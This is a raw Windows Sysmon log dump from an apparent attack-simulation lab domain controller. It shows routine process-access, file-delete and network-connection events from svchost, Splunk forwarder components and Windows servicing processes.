12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.248{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B671F0FAD7693BF2580BAC5A3AB67F,SHA256=182B79BE4CF08A12313E40855D75A4DB3640CC3BC0CD3195CEDD0463AA0F20E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.494{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53631-false10.0.1.12-8000- 23542300x80000000000000009538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:47.294{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9420A77271A3C051C2C4534E6D46E830,SHA256=2F95CB259D763D260FCF7DB88D76B5B55981685E13F81621D2D3173768F31C6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:47.107{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=EA84BF2462941C98639E2D3DF2863CC8,SHA256=CB400DC10CF2CB0AB4CC1C8C34AA4F511395C7DDF6061ECD228DE4E6FEB5EDB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:47.107{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C8FDD60ACDB7E2D51CA29C42DC8879D1,SHA256=1F735DC0113051C925BD912B3BADB575A8A8B1AE83193C2B7FCADDABD98E690B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:48.871{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=91847454475EBAE8BE505C28786DD157,SHA256=AB507145BEFA7FC33B8AFEE69791CE60B33D6C4A63E3E6E74A09D19A2BC1BF6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:48.309{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=141B43AE07A1B3645549E8F1F647DBAB,SHA256=AF4A09F570AB0D990C08821C268C9AB9D9B761CD3F219A9F6DB469324E865647,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:49.573{266CAFBE-655C-6064-4201-00000000AE01}6936NT AUTHORITY\SYSTEM\\?\C:\Windows\system32\wbem\WMIADAP.EXEC:\Windows\System32\wbem\Performance\WmiApRpl.hMD5=B133A676D139032A27DE3D9619E70091,SHA256=AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:49.323{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84CF844F0930CD1B4D85444950A6A648,SHA256=1DCDFE9A5975D32699E03E3A99AF66C010D4BD0357FE19DE5CF0D4D56B19CD9D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:49.197{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53632-false10.0.1.12-8089- 23542300x80000000000000009544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:50.354{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82D0DB9F4A810AAFE192EDA0E45F781E,SHA256=7656655A5B982BB96BD3A8950886BDCC337971C2750FF1C3A1C637B3D72AD1AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:51.368{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F8894DA2DD437DB31AFE5FB5E95B272,SHA256=2A06E6157CB4D5C4F6DEF116715BD501143D96ABBAD0F46ACBF9FABD0DFEC9F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:52.586{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=DEFF01B16D876F73469315D93BDA2555,SHA256=83A1DB6F393AE019756EF58D51568818E7069AAEF10A0183944D19349BE6E994,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:52.586{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=EA84BF2462941C98639E2D3DF2863CC8,SHA256=CB400DC10CF2CB0AB4CC1C8C34AA4F511395C7DDF6061ECD228DE4E6FEB5EDB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:52.383{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BA612E4BC1F93414A297591255E82D7,SHA256=A97D5CD26FA872F99C5C0F0DA75FDCCA864827908D194A4075051C443911AF6C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:52.431{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53633-false10.0.1.12-8000- 23542300x80000000000000009555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:53.398{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CB8A503B209D1FBE656E91F3C1D1B35,SHA256=6E9EA91656C6C7F506B88FA8A9B7A4F6160AE0334C030852480327167A0B2A2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:53.085{266CAFBE-6472-6064-2400-00000000AE01}2972NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.blfMD5=49A85EE8931492D7D674E211E1504280,SHA256=382D898102BCC1DB932C173B6559507D0CAC2F51EECCFEA0A3E54F72F15FC292,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:53.085{266CAFBE-6472-6064-2400-00000000AE01}2972NT 
AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.2.regtrans-msMD5=B6D81B360A5672D80C27430F39153E2C,SHA256=30E14955EBF1352266DC2FF8067E68104607E750ABB9D3B36582B8AF909FCB58,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x80000000000000009552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:53.054{266CAFBE-6472-6064-2400-00000000AE01}2972NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.1.regtrans-msMD5=B6D81B360A5672D80C27430F39153E2C,SHA256=30E14955EBF1352266DC2FF8067E68104607E750ABB9D3B36582B8AF909FCB58,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x80000000000000009551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:53.023{266CAFBE-6472-6064-2400-00000000AE01}2972NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.0.regtrans-msMD5=8A7F31E4FA3C8E2617498494A091D4CB,SHA256=95ED45DDDFF38BFFDB857D7CB682DC9CD866602DB4FE8BEFE28972D5A594DFC7,IMPHASH=00000000000000000000000000000000falsetrue 